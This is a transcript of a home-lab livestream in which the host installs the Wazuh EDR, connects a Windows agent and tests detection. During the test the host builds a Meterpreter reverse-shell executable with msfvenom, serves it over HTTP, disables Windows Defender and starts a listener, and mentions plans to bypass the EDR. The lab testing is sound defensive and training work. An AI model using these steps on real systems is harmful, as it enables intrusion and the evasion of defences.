So, hi everyone, welcome back, and I want to wish you happy New Year. Now we're back. We had a little bit of pause, but now I think it is the time to get back on track, try to learn many more stuff. Me personally, I'm gonna try to learn and explain a lot of stuff, and the main idea is to build a community where we can do so. So, thank you so much for joining in. And right now I'm going live, and also I'm live inside the my Discord channel. So if you want to chat and talk in real life or ask questions during the stream, you can join the Red Team in Army, then go back and just share your thoughts, questions, and so on. Yeah, so the main idea of today's stream is actually to set up Wazuh, I'm not sure how it's pronounced, maybe Wazuh, an EDR. So essentially, what that is in a nutshell, you have this open source EDR, and it is as it sounds. It's like an free EDR that you can use, and essentially, from what I see, it's kind of a wrap up over Elastic, and there are a lot of benefits, like they have CM solution, they use Elastic for aggregating data, and so on. It's like a Nextcloud. No, I don't think it's like Nextcloud, because Nextcloud is like a cloud where you can share files. It's more like an Elasticsearch, but essentially designed for threat hunting and doing endpoint protection. So I think that's what it is. I'm not sure yet. I just have it as an idea. Now is the time to just implement and install that. So I don't have a clue how that's gonna go, but that's gonna be what we're doing. So now this is my lab, and I think it's nice to understand what's going on, so we can go into the different fields. But before that, I just need 1 second. Okay, sorry. So now this is the lab we're gonna operate with. And this is essentially the combination of my server down there and my laptop right here from where I'm streaming. So on the server, it's quite a big PC, and it has a lot of RAM, a lot of CPU, and so on, and it can sustain a lot of virtual machines. And essentially, with that, I have designed my own network with Active Directory firewalls to mimic real-life environment, so we can do stuff like that and essentially test it. So this is the server I'm talking about, having this IP address. This is my laptop. On the laptop, I have a Kali VM, which of course we're gonna need for testing, and also I recently installed Kali on WSL, so we can also give that a try to see how native it is, if it's nice, if it's bad, to get some kind of a feedback. So I've installed WSL, we can also use that. Then on the server side, we have this giant, huge server, and on it you have a lot of VMs. Now, these VMs are inside their own network, divided by their own IP subnet, and essentially we have a pfSense firewall, acting as a firewall and a gateway to the network. It has two IP addresses. One is the external, which in that case it's that, and the other one is internal, which in that case is that. So it's quite the same as your router at home, but essentially inside the VM itself, which is crazy. Then inside that network, we have two domain controllers. We have a big box machine where we can pretty much test different attacks and test Metasploit and so on. We have two SQL servers, SQL1, SQL2. We have one internal Kali Linux machine, so we can do easier tests like relaying stuff and so on. We have Windows 10 client, and the new machine, Wazuh EDR. Now, I've already installed just the machine itself, and that machine is just an Ubuntu server. It has nothing on it, but completely nothing. Will this video be available on YouTube? Yes, I am currently recording, so as soon as I'm finished with recording, this video is going to be uploaded, so yes. Now, we have the brand fresh new Ubuntu server installed. It has nothing on it. So I can do config df minus h to see if the space is completely free. And now on this machine, we're going to install Wazuh EDR and essentially connect different machines with its agent. So as far as I know, it's like a similar to Elastic EDR. where you have one centralized server, then agents on different machines, and they connect to the server and spit data and so on. So that's what we're gonna do. Install the Wazuh server there, access it, and then use some kind of an agent to connect different machines, for example, Windows 10 client. Now I'm gonna hop in to here. I'm gonna open a new Brave window, or actually I'm gonna just move this one there. And now let's see, install Wazuh. Let's see how this is documented and is it too bad. Quick start. Okay. Now this is gonna be the boring part. So at 6 minute mark, we go into the docs. But now we have some kind of a system requirements. Okay. Now this is divided as I see on number of agents we're gonna need to have. And then for this number of agents, we're gonna need that many CPU, that many RAM, and that many storage. Now this is for 90 days because I think they mean that since Wazuh is gonna be used constantly, all of the data is gonna be populated to the Wazuh server, and essentially over 90 days, for 1 to 25 agents, you're gonna have 50 gigs of storage. So that's calculated per 90 days. So it should be free, but that's how much storage you're gonna need for this period. Then I think we have enough RAM. What was it? Cat, proc, meminfo. Pipe it to this. Yeah, we have 8 gigs of RAM, which should be fine. I'm just gonna double check from here. Yeah, we have 8 gigs of RAM and 4 CPUs. So based on our case, we have that requirement covered. So we have 4 CPUs, 8 gigs of RAM, and storage about 100 gigabytes. Yeah, should be fine. Now on the operating systems, we are also inside the supported versions. In that case, we are running Ubuntu 24.04. So or this one, I'm not sure, but should be fine either way. And that's it. That's it. So you need just to run this command. Okay, let's do it. So here, I'm sure. Yeah, I don't have pasting. That's gonna be complex to do it now, so I'm just gonna type it manually. So let's see. So let's do it. Scurl minus SO HTTPS. I should have gone for the desktop version, so I can just paste it. Okay. Sudo bash Wazuh install.sh. I think that's it. Minus A. Okay, run it. And based on the docs, if everything's alright, that's it. So for now, the installation process looks something like Sliver, one bash command, and that's it. So if that's the case, I'm gonna be happy, because in past streams where we were installing different tools, we had problems with the installation process. Let's say they were bad, but things should be fine now. Yeah, while that is running, let me see the next document, the next part of the docs. So when that's finished, we're gonna have the admin passwords for the Wazuh. That's fine. Then we can access the interface. You can find the password for all the Wazuh indexer at Wazuh API users in the Wazuh passwords.txt. Okay. Okay. Next steps, now that your Wazuh installation is ready, you can start deploying agents. This can be used to protect laptops, desktop servers, and so on. Instructions on how to deploy agents can be found in the Wazuh web user interface or in the docs. Nice. So why I went for the desktop server is because it's lightweight and essentially all the resources can go to the Wazuh server. I know that Ubuntu is generally not process efficient, resource heavy, but I just felt like it's going for the server is better. in the future we can set up some kind of SSH access so I can copy and paste and so on. But for now it's not needed. So that's the docs for the point agents. And if I think if I click on the agents I want to deploy, that's it. They made it so simple. They made it extremely simple. So Wazuh is the multi-platform, runs on the endpoints that the user wants to monitor. It communicates with the Wazuh server, sending data in real time through encrypted and authenticated channel. Nice, it's important. The agent was developed considering the need to monitor a wide variety of different endpoints without impacting their performance. It is supported the most popular operating system, yeah, okay. And it requires 35 megabytes of RAM. That's nice. Wazuh agent provides key features, okay, so log collection, that's nice. System inventory, malware detection, cloud security. Okay, and we don't have cloud, but the other things would be nice. To install Wazuh agent, select your operational system and follow the instructions. And that's also nice because if we go back to the graph, we can install Wazuh agents not only on the Windows systems, but on the Linux boxes such as VBox. And essentially in the future, we can try to do some kind of attacks and pivot from Linux, get access to the environment and so on, and observe what's detected on the Wazuh endpoint. Because that's one thing I saw in real life. Essentially, you don't have much visibility on Linux systems, and I think in that case, Wazuh is extremely nice because you can install agents on Linux machines and use them. Yeah, but let's see how it goes. Now the installation is finished. That's it. We have the username and password, and oh my god, I'm not sure how I can copy that. Actually, I am. Let's go for it. So I should have went for the SSH access. Was it BE star F7? Okay, I think I've done it. Now my IP address should be 99 at the end. Yeah, it is. So let me try to access it. I'm gonna go to Quanto1, which is gonna be our testing Windows system. Okay. And now I was testing one more tool, by the way, here, which is PowerShell Hunter. If you're interested, guys, drop some message in the comments or in Discord or anywhere, and I'm gonna make a video about it. It's about finding PowerShell commands and analyzing what happened on the PowerShell space. It's nice. So let me try to navigate to the Wazuh instance, HTTPS 172.60.60.99. Should be that. Advanced, continue. There it is. Admin, and make sure I paste it. Let's copy it correctly. So paste. Come on. I'm not sure why, but my copy paste is not working. Maybe try that. Okay, now that. There it is. Invalid. Okay, try again. Try again, my bad. Okay. What was it? U N Y was yes. Okay. It's the same one. I've copied it correctly. Yep, it's completely the same one. Admin is the username, invalid password. Okay, now it gets interesting. I'm sure I've copied the password correctly. And to be 100% sure, I'm gonna do it like that. I can mark. Okay, that's bad. Let's do it like that. Is that all? Or maybe it can be all. That's why. We Let's try it like that. There it is. Okay, it's all. It's not zero, it's all. My bad. Okay, so I guess there it is. We have it now, guys. Now let's see. That's the UI. And we have a lot of stuff. So essentially we can deploy agents to go for cloud security as Docker Cloud, AWS, O365. We have, I think, audits about different standards like PCI DSS, GDPR, and so on. So essentially, I think that I'm not sure, but I think that you can use your agents to scan the environment for that specific standards. I'm not sure. Then we have endpoint security. That's what we're gonna need essentially, and that's what we're gonna use it the most for. So we're gonna use it to have our own EDR lab and essentially to build tools so we can bypass it and do some kind of cool stuff. So we're gonna use mainly the endpoint security and threat intelligence because we want to see first if we can bypass it and if no, what was detected. So these are the things that we essentially need the most. And now by following documentation, now we need to install the agent. Now the agent can be, I think, downloaded from there. It can be deployed over SCCM, I believe. But I think that there should be able to generate an agent from the Wazuh itself and not by downloading from the cloud. So let's click here and explore it a little bit. I think this is the same as Elastic. So essentially, if you click on Discover, you're going to see the raw data coming to the Wazuh server. And essentially, there it is. You can use these fields on the left to essentially filter out the data. If I click that, you can see all these filters like that. Yeah. Now, I want to remove the filter, so I don't really need it. But from where was it? So, yeah, there it is. X, and that's it. Now, here what I see is usually Elastic used things like KQL, like the specified custom query language. Now I see Wazuh is using something different, which is DQL, which, to be honest, I have no idea what it's about, but I think that's a topic for different episodes. Now, what I want to see is how I can deploy agents. And now on the dashboard, no, should not be here. Should be on the endpoint security. So let's see, configuration assessment, select agent, and we don't have any agent. Okay, if I click on export agents, no agents. Let's see how I can generate one. Maybe on malware detection, nope. So let me go to the docs. And from there, we can also deploy new agent by following the instruction on the Wazuh dashboard. Go to endpoint summary and click on deploy new agents. So we need to find the endpoint summary, which I have no idea where it is. Maybe on the dashboard. Not on that, but on here. No, it's not on that either. Okay, so is there a search? Maybe a search would be nice to have. So let's see. Security operations, server management, maybe here. Endpoint summary, there it is. Okay, deploy new agent. Now click Windows because we're gonna deploy the agent to the client one. So essentially, what I want to do is deploy the agent here. So I'm gonna make this a little bit bigger so we can better see. And here I'm gonna deploy this agent to here. Okay. Now, deploy the agents. The instructions are looking very simple. Click on the MSI. Now the server address. I think there should be only IP, so 172.60.60.99. Remember,
Could I ask
yo,
anything?
yo, agent name should be 101. Okay, default group, and then run that command to install the agent. Okay, so it's PowerShell command, and I think I should run that as an admin. I think. So I'm gonna open new PowerShell, right click, run as admin, and essentially paste the command. So it's invoke web request. Is downloading the agent from the Wazuh cloud. It out files it to my temp folder, Wazuh agent, and then uses MSI exec to pretty much install that by setting the parameter we just defined. Okay, to install that, we're going to need PowerShell greater than 3.0. We have 5, so it should not be a problem. And in the fifth step, we just start it as a service. So each time our machine boots up, the Wazuh agent would be started, so it's automatically connected, which makes complete sense, right? So paste, run that. It's a huge binary. Oh,
It's not good for detection.
well, sorry again, please.
When the implement it was big, it's not good for detection.
No. That's the agent for the Wazuh agent. We are still installing that live on stream, so it's gonna be pretty much on YouTube, and you're gonna see the missed part on there if you want it, of course. But essentially, we are installing Wazuh, so that's an open source CDR, and yeah, Wazuh is actually plug and play for real. Now let's start again. Paste Wazuh service starting. Boom. That's it. That's it. So if I go now to discover, maybe, and I have all of data now. Okay. Now I'm not sure from which agent this data comes from, and we see it's from the Wazuh EDR. So what I want to see actually is agent.name, and I want to filter that out. So what that button does. Oh, we don't have logs for now from our machine, but I think they're gonna soon arrive. Oh, there it is. There it is. Now we have some kind of logs. Okay. So I'm gonna go to agent.name. I'm gonna add that. And there it is. We have now a lot of logs for from our Quantum 1 machine. Okay. Now let's try to. Yeah, I mean, simply by looking at the logs, I don't think it makes that much sense because they are so much. So essentially, if I close that, you can see that for just maybe some several seconds, we have 600 logs, and they are, believe me, are getting bigger. So if I refresh, and we can see now it's, come on, never mind. Okay, so we have all the log files, and now we need to find a way to somehow look through them. And let's see. So we can define our custom dashboard just like in Elastic. So we can add different fields so we can better understand what's going on. We're not going to do dashboards now because we don't need it. On the Visualize tab, we can pretty much see some kind of a graphs about the state of the log files, and we can see that a lot of them are coming from our client 01. Now, reporting, let's see, nothing there. Let's go for alerting. We can create a monitor, nice. And we can use some kind of a queries to alert if something happens and trigger. That's nice. Okay. Now, what I'm interested at the most is what is map? What is map? Oh, okay, nice. Notification. Okay, so nothing fancy here. But what I'm mainly interested at is this endpoint security pane. So let's see what we have there. We have configuration manager, No agent is selected. We can now select our agent, click it, and boom, we have some kind of stats about it. Now, what are these stats about? Okay, we have, oh, so we ran some kind of a tests, and it passed 124 of them and failed 266. Okay, now let's see what happens. We can filter them based on passed and failed, and let's see what we can find from it. So the force password history is set to 24 or more passwords, and you have all of description for each one of them. So it's not just an EDR, it's an EDR that tells you what to do and what needs to be fixed, which is nice. The name guest account failed because, yep, I have guest account. Configure interactive fogon, okay, we don't need that. Disable IPv6, okay, that failed as well. Ensure account workout duration is set to 15 or more minutes. That's by default. I didn't touch it. Ensure that workout threshold is set to 5. Now, in my case, it's more because I'm testing. What was it? I was testing password spread attacks, and I manually set it to more. So, yeah, we have a lot of tests which were ran from that system, and we may take a look at that.
Could I ask for something?
Yeah, of course.
I just wanted to ask for the lab who you are making all this stuff on it. Is this your local lab? Meaning, is this VPS server or your local server or your local machine? You install all this stuff on it.
Yeah. So I explained that in the beginning, but essentially, I have two machines from where I work. One machine is a huge PC next to me down there, and essentially, this machine is having a lot of resources, like 64 gigs of RAM, Ryzen 7, and so on. And inside this machine, I have a lot of VMs. So all the things you see here are inside this server there. So as you can see, these VMs are inside this server. And essentially,
Is
I
this
have the laptop. Yeah, sorry.
is this server in your on your laptop or a separated server?
A separated, different one.
Okay.
Yeah, a different one. And I also have the laptop from where I stream and make the videos and so on. So
You say you have a separated server. You
yes,
doing all this stuff on that server, right?
yes, from the laptop. The server is there just to use the resources and host a lot of virtual machines.
Okay.
Yeah, yeah, yeah. There is the graph. If you want, I can share it. You can see how I set up things. I have my router, I have the laptop, I have the VM, the server, and so on. So that is going to be again explained in the video, so you can take a look when I upload it. Okay. Now let's see inventory. Not sure what that is. Sees Microsoft 10 Enterprise benchmark. So maybe that was the kind of test that it was done. Then events. Yeah, we can see the events based on the endpoint itself and the tests. Yeah. So that's nice because for each test, you can see what the Wazuh actually did. So it has a lot of explanation, which is so nice. Now let's go for malware detection. That's maybe the best one so far. What I'm gonna do, generate malware. Let's go. So file, open, let's open up the internal Kali VM. So essentially I'm gonna operate from this box because it's already connected to the network, and main idea is not to do some kind of a tricky tunneling and shady port forwarding and so on, but just to test the Wazuh EDR. So that's it. Yeah, you wanted to say something?
No, nothing.
Okay. Sorry.
Everything is clear.
Nice. Yeah. Why I can't even... Oh, yeah, I got it. In general, invite people. That's strange. Okay. I think someone messed up my Discord server because I cannot generate an invitation link. I'm not sure why. Yeah, I'm searching for it. I'm searching for it.
What he want?
I cannot generate an invitation link for my Discord.
Wait. I will make. What can I? Can I copy the link in the chat in the Twitch?
Yeah, of course, yeah. Oh, there it is. Okay. Yeah, thanks. Okay, now let's get back. I'm gonna see to temp. We need to make the window bigger. Yeah, I think it's better. Now I'm gonna generate the very basic MSF Venom payload just to see how it is detected, how the alert is looking like, and essentially what does it do. So let's go. I'm gonna do MSF Venom -P Windows x64 interpreter reverse TCP. Let's go lhost bth0 l-port 444 and format exe output into msf.txt. The most obvious interpreter ever possible. So yeah, that generated. I'm gonna do Python M HTTP server on port 80. It's already in use, 8000. Now let's see what happens if I download any malware. Now I don't see any agent here. If I go to Task Manager, we have the Wazuh agent there, which is nice. I'm not sure why it was 32-bit. Let's see. So HTTP, go to the web server and download msf.exe. So let's see what happens, how the alert is looking like. Are we gonna see that in here and what's gonna happen? So click keep, then keep anyway. And we have Defender alert. Not Wazuh alert, but Defender alert. So what I'm gonna do is I'm gonna stop the Defender now and download it again. Like that. Keep anyway. Okay. So I'm gonna set up the listener. So sudo msf console. Don't tell me it's not gonna detect that. Or maybe we didn't start the EDR process. I'm not sure. But it should be able to detect that. That's a interpreter payload. Use
I
exploit.
don't think we'll
Yeah.
will detect that. I don't think we will detect that.
Mm-hmm. Set the host. H0. Run. The port is the same. The payload is also the same. So it was stopped. Okay, that's at least good. So refresh. Let's see if we can get some kind of a data from it. Hmm. So we have a nice dashboard about the different agents. We can see how many we are active and so on, which is nice for managing stuff. But I don't see the alert. I want to see what happened. So it's not that. Yeah, should be malware detection. Should be. Hmm. Have these filters? Ah. Okay, let me do it like that. There it is. Okay, let's see how to enable DDR because DDR right now is not working. So, yeah. Oh, actually, it's XDR here. The interpreter was not even detected, guys. Do you have any idea why that happened? What did we miss?
I don't know.
Successful login? No, it's not that. It's definitely not that.
Could I ask you something?
Yeah, of course. Yeah.
Why you don't install something like Good Project and there is built-in detection lab in that lab in Good?
That's my idea. I want to build detection lab. That's why I install Wazuh EDR. Yeah,
But
that's the
Good,
idea.
it's the whole environment have Wazuh and ELK for Elastic and so on.
Sorry again.
Good Project has a lot of something like that. Why you don't installing it?
Why I set up Wazuh?
No, why you don't install a Good Project?
Ah, you mean good EDR like Elastic?
No. The whole lab for Active Directory, game of Active Directory for
Ah, I
one
have it.
design.
I have it. I have it. I have it.
Got
I also have it. Yeah. I have the SCCM lab. It's actually there. So,
to say something.
yeah, there it is.
You are one
There
of
it
the
is.
best YouTubers I have ever seen. Really.
Yeah, thanks. Thanks so much. But
You're welcome.
I have no clue why we don't have detection. So let's find XDR components. Mm-hmm. It's not that. We have the monitoring part, but we don't have the endpoint detection part. Mhm. Hmm. Let's see. We don't need that. Let's see here. Let's see there. Configuration. Malware detection? Nope. More. Hmm. Right, installing DDR agent maybe? That's a point. Or maybe restarting the machine. Maybe. So
Yeah,
let's see.
maybe.
Yeah, that's maybe one thing because usually when you install some stuff, you always need a restart. So let's see what happens. Hmm. That's strange. That's odd. I was expecting some kind of alert or something at least to happen, but okay. Come on. Okay. Let's see now. One agent is active. That's it. So see downloads. MSF.exe. Defender detected it. Now let's turn off Defender because obviously we don't need Defender now. That's not the point. Or does we? Do we? Okay. Now that's gone. Now install that again. So download again. MSF.exe. Keep. Should be gone by now. If you download Meterpreter, it should be gone by now. Should be detected. Yep, there it is. Oh, okay. Now, why that happens? I'm not sure why. Nothing. Okay. Maybe we have some kind of a filter. Maybe. Save all. Remove all. No. Hmm. Yeah, we need to read more about that. It's not that. Hmm. Maybe ChatGPT would know about that. So let's try to ask him about it. So why Wazuh? Let's see. Rules from maybe this can make sense. Yeah, ensure this one is installed. But I think we have that because we can see the data. Updatable set. Okay. Let's see. See, we have space. Yeah. See, program files, x86, host agent. Yeah, I know. And works. It's empty. Yep, I've already did that. Let's see the sysmon. Or actually, wait. No, it's not there. Any idea, guys? Any idea why the XDR is not working? I simply
Maybe
don't.
the update, as he say.
The rule sets.
Update.
Maybe we can try. Actually, let's do it like that. Let's do it like that. We can now copy paste. That's broken. Yeah, that's broken. Okay, that's not gonna happen. So most likely ChatGPT doesn't have that much idea what happens and why that happens. I think we're gonna do it on two parts because it's already like 1 hour of stream. So let's give it a little bit more try. Rules. Okay. There are all the rules. And we have all of rules, but I'm not seeing the ones for endpoint protection. Hmm. I don't have any idea what I'm looking at. Oh, we don't need that. Algorithm maybe? Nope. The rootkit's malware activity. Hmm. We have something, but not on the client or one, but on the
Really?
well,
Where? Trojan version?
yeah, but it's not that.
Ah, okay.
I think because it's not on the client or one, but it's on the Wazuh EDR. That's so strange. I just trying to find out why it doesn't work, but I just can't. Hmm. Yeah, yeah. Hmm. So it can do many stuff based on the Java rules, most likely. Yeah, detecting malware using Java. Let's see that. Okay, that's what we need. But see, it can do many stuff like SQL injections, execution of commands, and so on. But let's go for the malware detection. That's why. Because we don't have rules for the malware. And we need to now follow this documentation, which is gonna actually, yeah, I'm gonna leave that to the next one.
Oh, so you need to install Yara.
Yeah, so I think I'm gonna need a little bit of time to assimilate what happened and think about what can be better. But I think that we do not have Yara installed, and we don't have rules for Yara. And we have the agent, but we don't have the rules, so the agent do not know for what to look for. And that's why Wazuh is open source, because you can essentially implement any Yara rule you have, which I think is the main point of the agent, I think. So I'm gonna leave it now. For the next time, I'm gonna do another stream where we can integrate some kind of IR rules and then test it again. But that's nice, because I think that if we have good enough IR rules, then we're gonna essentially have a nice EDR. But I don't know. I don't know. I thought that there's gonna be some kind of a preview detection with the tool, but now I think they are not. So we need to implement the detection ourselves. Yeah, there it is. That's how we can, for example, detect netcat, which is also nice. And it's good because we can use that to harden not only Windows systems but Linux ones. So I think we can upgrade a lot of that. So yeah, I'm gonna cut it out for now. Thank you so much for watching. Happy New Year. That's how you can
Thank you.
install Wazuh server, and in the next one we're gonna just implement it and make it better. Yeah.